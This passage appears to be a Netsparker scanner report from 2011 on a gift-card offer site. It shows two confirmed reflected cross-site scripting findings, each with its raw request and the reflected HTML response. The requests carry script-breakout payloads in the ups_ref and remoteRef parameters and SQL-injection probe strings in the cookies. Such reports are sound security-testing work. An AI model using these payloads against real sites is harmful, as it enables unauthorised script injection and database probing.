You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET '"--></style></script><script>alert(0x0001CC)</script>
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CC)%3C/script%3E&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:13 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e52d26aamv;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--></style></script><script>netsparker(0x0001CC)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CC)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CC)</script>&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET '"--></style></script><script>alert(0x0001CD)</script>
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CD)%3C/script%3E&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:15 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e7db109nim;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--></style></script><script>netsparker(0x0001CD)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CD)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CD)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
